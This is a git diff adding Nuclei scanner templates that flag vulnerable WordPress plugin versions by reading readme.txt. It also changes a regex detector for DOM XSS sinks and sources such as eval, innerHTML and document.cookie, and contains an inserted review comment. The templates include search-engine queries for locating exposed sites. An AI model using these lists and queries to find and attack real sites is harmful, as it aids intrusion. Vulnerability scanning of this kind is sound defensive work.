@@ -0,0 +1,59 @@ +id: contest-gallery-36b5f89448d064c7305ddcbc679586d1 + +info: + name: > + Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/contest-gallery/" + google-query: inurl:"/wp-content/plugins/contest-gallery/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,contest-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contest-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 23.1.2') \ No newline at end of file diff --git a/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml b/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml new file mode 100644 index 0000000000..f82e1b2ef6 --- /dev/null +++ b/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml 
@@ -0,0 +1,59 @@ +id: display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468 + +info: + name: > + Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/display-a-meta-field-as-block/" + google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "display-a-meta-field-as-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file diff --git a/poc/other/dom-invaider.yaml b/poc/other/dom-invaider.yaml index 726c653298..b720bd8f88 100644 --- a/poc/other/dom-invaider.yaml +++ b/poc/other/dom-invaider.yaml 
@@ -1,17 +1,23 @@ id: dom-xss info: - name: DOM XSS Sources & Sinks - reference: https://portswigger.net/blog/introducing-dom-invader + name: DOM Invader - Cross-Site Scripting author: geeknik - severity: info - tags: dom,xss - + severity: high + description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality. + reference: + - Inspired by https://portswigger.net/blog/introducing-dom-invader + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: xss,file file: - extensions: - js - ts - html + - htm - php - cs - rb @@ -22,7 +28,7 @@ file: name: sink part: body regex: - - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' - 'fetch(\.body)?' - 'history(\.pushState|\.replaceState)' 
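Review bot: In the rewritten jQuery sink regex the alternative `\.attr.onmousedown` still has an unescaped dot while every neighbouring alternative escapes it; the line should use `\.attr\.onmousedown` so the match is literal and consistent. The first hunk's new `description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality.` misdescribes the template, which is a file-based grep for DOM XSS source and sink names rather than a finding against DOM Invader; something like `description: Flags DOM XSS source and sink names in local source files; pattern list inspired by PortSwigger's DOM Invader.` would be accurate. The reference entry `Inspired by https://portswigger.net/blog/introducing-dom-invader` should be the bare URL, since the field is a list of links. Raising `severity` to high and attaching a CVSS vector to a regex heuristic overstates what a match means; a match here is a lead to review, not a confirmed vulnerability.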
@@ -36,6 +42,7 @@ file: - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' - 'iframe(\.srcdoc|\.src)' - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex name: source part: body @@ -43,3 +50,5 @@ file: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' + +# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml b/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml new file mode 100644 index 0000000000..fdada3f27c --- /dev/null +++ b/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml 
@@ -0,0 +1,59 @@ +id: e2pdf-b0d40d85770d0e3959eca97a13f2f029 + +info: + name: > + e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/e2pdf/" + google-query: inurl:"/wp-content/plugins/e2pdf/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,e2pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "e2pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.25.05') \ No newline at end of file diff --git a/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml b/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml new file mode 100644 index 0000000000..bcfa9f40d4 --- /dev/null +++ b/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml 
@@ -0,0 +1,59 @@
+id: embedpress-63790850863aa3a88ecce00a79a7021b
+
+info:
+ name: >
+ EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/embedpress/"
+ google-query: inurl:"/wp-content/plugins/embedpress/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,embedpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "embedpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.9')
\ No newline at end of file
diff --git a/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml b/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml
new file mode 100644
index 0000000000..d022c89006
--- /dev/null
+++ b/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml
@@ -0,0 +1,59 @@
+id: formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4
+
+info:
+ name: >
+ FormFacade <= 1.3.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/formfacade/"
+ google-query: inurl:"/wp-content/plugins/formfacade/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,formfacade,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formfacade"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml b/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
new file mode 100644
index 0000000000..c581b7ce3f
--- /dev/null
+++ b/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
@@ -0,0 +1,59 @@
+id: givingpress-lite-f13848717586edd56855949bd81c07fd
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml b/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
new file mode 100644
index 0000000000..80b1f4858f
--- /dev/null
+++ b/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
@@ -0,0 +1,59 @@
+id: gutentor-d377e101a76164370c9cc0ec45a485ee
+
+info:
+ name: >
+ Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.5')
\ No newline at end of file
diff --git a/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml b/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
new file mode 100644
index 0000000000..9a1fece812
--- /dev/null
+++ b/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
@@ -0,0 +1,59 @@
+id: hr-management-eb3b99f576f6e9904bb734d15faf495b
+
+info:
+ name: >
+ Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/hr-management/"
+ google-query: inurl:"/wp-content/plugins/hr-management/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,hr-management,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "hr-management"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml b/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml
new file mode 100644
index 0000000000..969777e2a1
--- /dev/null
+++ b/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml
@@ -0,0 +1,59 @@
+id: html5-video-player-ca0016b58a304c45cd93a8c5f0474313
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.30 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,html5-video-player,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.30')
\ No newline at end of file
diff --git a/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml b/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml
new file mode 100644
index 0000000000..ffe1c7b8fd
--- /dev/null
+++ b/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml
@@ -0,0 +1,59 @@
+id: icegram-a0b801eb66ca58090afd94117ad9974e
+
+info:
+ name: >
+ Icegram <= 3.1.24 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.24')
\ No newline at end of file
diff --git a/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml b/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml
new file mode 100644
index 0000000000..1a9bdbe28c
--- /dev/null
+++ b/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml
@@ -0,0 +1,59 @@
+id: icegram-fdccf66c281808c211e00f643959c680
+
+info:
+ name: >
+ Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.25')
\ No newline at end of file
diff --git a/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml b/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml
new file mode 100644
index 0000000000..3dd46d8435
--- /dev/null
+++ b/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml
@@ -0,0 +1,59 @@
+id: icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70
+
+info:
+ name: >
+ Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram-rainmaker/"
+ google-query: inurl:"/wp-content/plugins/icegram-rainmaker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram-rainmaker,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram-rainmaker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.14')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml b/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml
new file mode 100644
index 0000000000..1ccc8de18c
--- /dev/null
+++ b/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml b/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml
new file mode 100644
index 0000000000..90a3cbfbbf
--- /dev/null
+++ b/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml b/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml
new file mode 100644
index 0000000000..f84044c785
--- /dev/null
+++ b/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml b/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml
new file mode 100644
index 0000000000..f98a9bdd30
--- /dev/null
+++ b/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml
@@ -0,0 +1,59 @@
+id: invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2
+
+info:
+ name: >
+ Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/invite-anyone/"
+ google-query: inurl:"/wp-content/plugins/invite-anyone/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,invite-anyone,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "invite-anyone"
